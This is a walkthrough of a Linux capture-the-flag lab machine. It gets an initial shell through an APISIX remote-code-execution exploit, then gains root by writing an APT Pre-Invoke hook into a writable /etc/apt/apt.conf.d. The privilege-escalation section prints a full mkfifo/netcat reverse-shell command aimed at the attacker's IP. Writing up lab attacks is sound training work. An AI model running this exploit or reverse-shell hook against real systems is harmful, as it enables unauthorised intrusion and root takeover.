Basic Information: PG Practice Linux Machine, Level Easy, Target IP: 192.168.248.220
TL;DR for those who only want a quick solution.
- Port 43500 runs Apache APISIX 2.8, which is covered by exploit-db 50829 (Apache APISIX 1.3 - 2.12.1 remote code execution); running that exploit gives the initial foothold as the user franklin.
- /etc/apt/apt.conf.d is writable by franklin, and root runs apt-get update from cron, so an APT Pre-Invoke hook dropped into that directory executes as root.
Initial Enumeration
Continue with a version and script scan against the ports found open:
sudo nmap -sS 192.168.248.220 -p22,80,3306,43500 -vv -sV -A
- 22, a regular SSH port; without credentials you normally don't get the initial foothold from there.
- 80, HTTP, page title Upright, nginx/1.18.0
- 3306, MySQL; nmap reports it as unauthorized, meaning the server refuses connections from our host.
- 43500, an OpenResty web application server whose Server header shows APISIX/2.8
We'll start by taking a look at the web port 80, visiting http://192.168.248.220
content of port 80
- Nothing too special, just a static-looking site: most of the buttons lead back to the home page. Understandable for a CTF VM, it doesn't need to be functional. Extracting every href from the page with curl, grep and sed turned up nothing useful either.
- One piece of information that could be useful is the email address [email protected]
- Ports 3306 and 43500 are obviously the suspicious ones, but I prefer to follow my usual pentest routine and enumerate directories on port 80 first. I normally use gobuster with dirb's big.txt wordlist:
- gobuster dir --url "http://192.168.248.220" -w /usr/share/wordlists/dirb/big.txt
- From past experience the three folders gobuster found can be ignored; they contain nothing of interest.
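The href sweep mentioned above, as an added shell example that is not from the original write-up: it pulls every link target and every mailto address out of a page with grep and sed, so you can read them in one list instead of clicking around. The HTML used in the usage note is constructed; against the target you would pipe in curl -s http://192.168.248.220/.

```shell
#!/bin/sh
# Added example, not code from the original write-up.
# Reads HTML on stdin and prints every unique href target, one per line.
# Handles both double- and single-quoted attribute values; sorted with
# LC_ALL=C so the order does not depend on the locale.
extract_hrefs() {
    grep -oE "href=[\"'][^\"']*[\"']" \
        | sed -E "s/^href=[\"']//; s/[\"']$//" \
        | LC_ALL=C sort -u
}

# Only the e-mail addresses behind mailto: links, the kind of detail worth
# noting for later (as with the address found on the Upright site).
extract_mailto() {
    extract_hrefs | grep '^mailto:' | sed 's/^mailto://'
}

# Usage against a live target:
#   curl -s http://192.168.248.220/ | extract_hrefs
#   curl -s http://192.168.248.220/ | extract_mailto
```

Running it on a constructed page such as `<a href="/index.html">Home</a> <a href="about.php">About</a> <a href='mailto:user@example.com'>Mail</a>` yields the three targets sorted and de-duplicated, with extract_mailto reducing that to user@example.com.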
Moving on to port 3306: mysql -h 192.168.248.220 reports that our host is not allowed to connect.
That leaves port 43500. Visiting it in a browser shows nothing but an error message.
- Remember from the port scan that the Server header on port 43500 is APISIX/2.8. Search for it on exploit-db.com, or with searchsploit from a Kali terminal: searchsploit apisix
- There is one hit, ID 50829. Grab a copy with searchsploit -m 50829 and read how to use it.
- The exploit's header says it works against APISIX 1.3 - 2.12.1; our target runs APISIX 2.8, so it should work.
- Looking at the usage, the arguments are target_url, lhost and lport.
Initial Foothold
We found exploit 50829.py earlier; now let's use it against the target.
- Before running it, set up a netcat listener first:
- nc -nlvp 443
- Run the exploit:
- python3 50829.py http://192.168.248.220:43500/ 192.168.45.235 443
- The exploit works and we have a shell as franklin. One oddity: ls -la returns permission denied, and pwd shows we are in /root. The shell inherited /root as its working directory from the APISIX process, and franklin has no permission to read it.
- To get out of there we move to /home/franklin, but first upgrade to an interactive shell with
- python3 -c 'import pty;pty.spawn("/bin/bash")'
- In /home/franklin we find local.txt, the unprivileged flag.
Now we need to escalate privileges.
Privilege Escalation
Normally I enumerate the system manually first:
- sudo -l
- to see whether franklin can run any command with sudo
- find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
- to find any unusual setuid or setgid binaries; if there is one, look it up on https://gtfobins.github.io/ to see how to exploit it.
- Here the list contains /bin/ssh-agent, but that binary is setgid by default on Debian-based systems and is not exploitable.
I also looked through files for sensitive credentials and found nothing. This is where I bring in linpeas.sh (https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS); it is smarter and more thorough than me.
- Transfer linpeas.sh to franklin's reverse shell, chmod +x linpeas.sh to make it executable, then run it.
- The key finding: franklin can write to /etc/apt/apt.conf.d. The output points to https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files, but I could not find a solution there. A quick search for "etc apt apt.conf.d privilege escalation" led to a page that explains it well: https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation/
- Every file in /etc/apt/apt.conf.d is parsed as apt configuration, and an APT::Update::Pre-Invoke entry is executed through /bin/sh by whoever runs apt-get update. So for this to pay off, someone with root privileges has to run apt-get update.
- Looking into /etc/crontab, root has a scheduled job that runs apt-get update, which means we can escalate privileges via /etc/apt/apt.conf.d.
- Now set up another netcat listener. I normally pick ports that are usually allowed out through a firewall, such as 443, 445, 22 or 53.
- nc -nlvp 445
- In franklin's reverse shell, type the following commands; a root shell should come back on the next cron run.
- cd /etc/apt/apt.conf.d
- echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.235 445 >/tmp/f"};' > pwn
Mission Accomplished!